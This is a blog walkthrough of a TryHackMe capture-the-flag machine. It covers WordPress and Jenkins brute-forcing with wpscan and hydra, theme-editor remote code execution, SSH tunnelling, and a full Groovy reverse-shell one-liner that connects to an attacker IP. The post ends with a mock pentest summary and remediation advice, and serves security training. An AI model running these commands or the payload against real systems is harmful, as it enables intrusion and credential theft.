Internal (Windows)
Enumerate SMB shares, gain foothold by exploiting Jupyter, pivot with SSH key, and escalate priviledge with Runas.
Posted Updated 
By
7 min read
Video
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
nmap -A -Pn -p- 10.10.74.197 -oN nmap
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-27 07:33 EDT
Nmap scan report for 10.10.74.197
Host is up (0.22s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1009.54 seconds
Port 80
Feroxbuster
1
2
3
4
5
6
7
8
9
10
11
feroxbuster -u http://internal.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -r -C 400,401,402,403,404,500,501 -o ferox
200 GET 15l 74w 6147c http://internal.thm/icons/ubuntu-logo.png
200 GET 375l 964w 10918c http://internal.thm/
200 GET 328l 3640w 53892c http://internal.thm/blog/
200 GET 0l 0w 0c http://internal.thm/blog/wp-content/
200 GET 0l 0w 0c http://internal.thm/blog/wp-content/themes/
200 GET 0l 0w 0c http://internal.thm/blog/wp-content/plugins/
200 GET 83l 284w 4530c http://internal.thm/blog/wp-login.php?redirect_to=http%3A%2F%2Finternal.thm%2Fblog%2Fwp-admin%2F&reauth=1
200 GET 965l 2973w 34787c http://internal.thm/javascript/scriptaculous/controls
200 GET 7036l 18816w 180822c http://internal.thm/javascript/scriptaculous/prototype
200 GET 275l 856w 10162c http://internal.thm/javascript/scriptaculous/slider
wp- stands for wordpress
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress
/etc/hosts
wpscan
1
wpscan --url http://internal.thm/blog/wp-login.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
[+] URL: http://internal.thm/blog/wp-login.php/ [10.10.213.152]
[+] Started: Thu Aug 29 20:25:20 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress readme found: http://internal.thm/blog/wp-login.php/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] This site seems to be a multisite
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| Reference: http://codex.wordpress.org/Glossary#Multisite
[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-login.php/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Most Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
| Confirmed By:
| Common Wp Includes Query Parameter In Homepage (Passive Detection)
| - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-includes/js/wp-util.min.js?ver=5.4.2
| Query Parameter In Install Page (Aggressive Detection)
| - http://internal.thm/blog/wp-includes/css/dashicons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-includes/css/buttons.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-admin/css/forms.min.css?ver=5.4.2
| - http://internal.thm/blog/wp-admin/css/l10n.min.css?ver=5.4.2
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:33 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:33
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Thu Aug 29 20:26:08 2024
[+] Requests Done: 334
[+] Cached Requests: 4
[+] Data Sent: 92.668 KB
[+] Data Received: 22.31 MB
[+] Memory used: 261.414 MB
[+] Elapsed time: 00:00:48
┌──(kali㉿kali)-[~]
└─$
Wfuzz
1
wfuzz -c -f wfuzzing -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hl 375 -u "http://internal.thm" -H "HOST: FUZZ.internal.thm"
Scan for sub-domain, doesn’t work
Wordpress
http://internal.thm/blog/wp-login.php/
Log in with random username and password
Login with admin
Hydra? maybe?
Actually we can brute force password with WPScan
1
wpscan -U "admin" -P /usr/share/wordlists/rockyou.txt --url http://internal.thm/blog/wp-login.php/
1
admin:m[Redated]s
It works
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress
Pentest monkey shell.php
Theme editor
1
http://internal.thm/blog/wp-admin/theme-editor.php
Update the theme
RCE
1
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
1
2
3
4
5
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
/** MySQL database password */
define( 'DB_PASSWORD', 'wordpress123' );
Not useful
https://api.wordpress.org/secret-key/1.1/salt/
1
2
3
4
5
6
7
8
define('AUTH_KEY', 'jP?c; }x]=#3QF -]?n q$xa|WXUajc%zXfPHZAPGgeO(^1QA,gOLs}kMCb+oKZ:');
define('SECURE_AUTH_KEY', '#*w?)9miW:R.3*0jXNo3 ^[6*_/+@eYjyFo.,Y-@}l=amIHTthtJ#43C*1{]#Pb(');
define('LOGGED_IN_KEY', 'j{m1WWx|G1FIDp>2,mfer+iPiF/;ru<%Tx%%j|R6i-~@I%GDJaum>i5DlZ+y|d++');
define('NONCE_KEY', 'IZaBM;scMR1qNY0_706:[6D_}nhj:nA0kl47| ;<K+Y--6`r[4uvN0tSZ#l)+Ft1');
define('AUTH_SALT', '*KWq;K+m$}]II$QJI7w_R^K}fLt%R^SMfD6ln7qbeU5+k@Bx+2fmIPxI?+UM*+Pm');
define('SECURE_AUTH_SALT', '|V<nOy_B^76t<p^%ufbLXrBF3|Fuv`I<|[Z|^WUkzptS]P*,Gm1k;LdxJMtAlnB%');
define('LOGGED_IN_SALT', 'zY qVsUyx;]hP)7M3w2}w/|4.G5R-1b8$wXsdVm=DjH}>gZ@s(_%n7K=0E-%?]//');
define('NONCE_SALT', 'Tf{mwDO];PnGjGRc!&_I*h3e*8Vnu5EsIG/l2x/W(dSkI*DLedB+JVu~_HY.EZ?l');
linpeas.sh
chmod +x linpeas.sh
1
aubreanna
1
cat /usr/share/openssh/sshd_config
1
2
B[Redated]q
wordpress123
1
2
3
4
5
6
╔══════════╣ Readable files belonging to root and readable by me but not world readable
-rw-r----- 1 root www-data 68 Aug 3 2020 /var/lib/phpmyadmin/blowfish_secret.inc.php
-rw-r----- 1 root www-data 0 Aug 3 2020 /var/lib/phpmyadmin/config.inc.php
-rw-r----- 1 root www-data 527 Aug 3 2020 /etc/phpmyadmin/config-db.php
-rw-r----- 1 root www-data 8 Aug 3 2020 /etc/phpmyadmin/htpasswd.setup
/opt useful
1
aubreanna:bu[Redacted]3
SSH
1
2
ssh aubreanna@10.10.93.74
bu[Redacted]3
Port forwarding?
SSH Tunnel
1
2
3
4
5
6
7
8
9
10
11
12
13
14
aubreanna@internal:~$ ss -tulpn
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*
udp UNCONN 0 0 10.10.93.74%eth0:68 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:42721 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
aubreanna@internal:~$
From our local machine, run ssh -L 10000:localhost:10000 <username>@<ip>
1
2
ssh -L 6868:172.17.0.2:8080 aubreanna@10.10.93.74
aubreanna:b[Redacted]3
#use different port than 8080 because we’ll need to use Burpsuite
Now navigate to localhost:6868 on web-browser
Nothing works
Tried default credential from Butler but still doesn’t work
Gotta use burpsuite
Burpsuite
Burpsuite uses port 8080 so we SSH tunnel to 6868
Also keep ssh port 22 connect too to enable SSH tunneling
Hydra to Jenkins
TryHackMe Hackpack has bruteforce process with hydra.
1
hydra -l /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 6868 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -f
If it take too long just try to brute force with username: Admin
1
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 6868 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -f
SUCCESS!!!
Jenkins credential
1
admin:s[Redacted]b
Jenkins RCE
Groovy syntax
1
String host="10.13.47.211";int port=6666;String cmd="sh";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
python -c 'import pty;pty.spawn("/bin/bash")';
Did we just pivot to another machine?
Linpeas.sh again
1
root:t[Redacted]3
SSH to root
1
2
3
root@internal:~# cd /home/aubreanna && cat user.txt && cd /root && cat root.txt && ifconfig && date
THM{Redacted}
THM{Redacted}
Summary
A penetration test on INTERNAL corp on September 3th 2024 on an environment due to be released to production in three weeks. A security penetration test is a simulated cyber-attack on a computer system or network. The goal of this test is to identify and exploit vulnerabilities in the system in order to assess the system’s security posture. Penetration tests are an important part of a comprehensive security strategy and can help organizations identify and fix vulnerabilities before they are exploited by attackers.
Key Finding:
- Initially we gain access of Apache 2 Ubuntu default page, but after doing directory busting we can access to the login page for
Wordpress. Wordpressis susceptible to information disclosure vulnerability by show a valid account ofadmin, when doing brute forcing attempt. Theadminaccount has a weak credential.Wordpressis also susceptible to Remote Code Execution, that enable attacker to successfully launch a reverse shell and access the web account.- After enumerating through the account, there is a valid user credential stored, and accessible to pivot to using secure shell (SSH). Which allow attacker to retrieve the first flag.
- A text document inform that a service (
Jenkins) is running on another service calledDocker. - Attacker pivot to the service by using the user credential stored in the system.
Jenkinsaccount has a weak credential that allows attacker to brute force the password. The service allows attacker to run a arbitrary code to pivot and find another credential to escalate privilege to gain root access and retrieve the second flag.
Remediation Suggestion:
- Strong Password policy - Implementing minimum character to at least 16 character and a mix of letter, number and symbol which can discourage attacker from brute forcing the credential.
- Attempt Limit policy - time out multiple fail login attempt, keeping attacker from brute forcing attack.
- Multi Factor Authentication - an authentication process should be enable when account being access on services like WordPress and Jenkins.
- Stored Credential - sensitive credential should not be store in plaintext file. Should implement a password manager.
- Sensitive Information Disclosure - critical document such as service information, credentials should not be a store and accessible on the system.
This post is licensed under CC BY 4.0 by the author.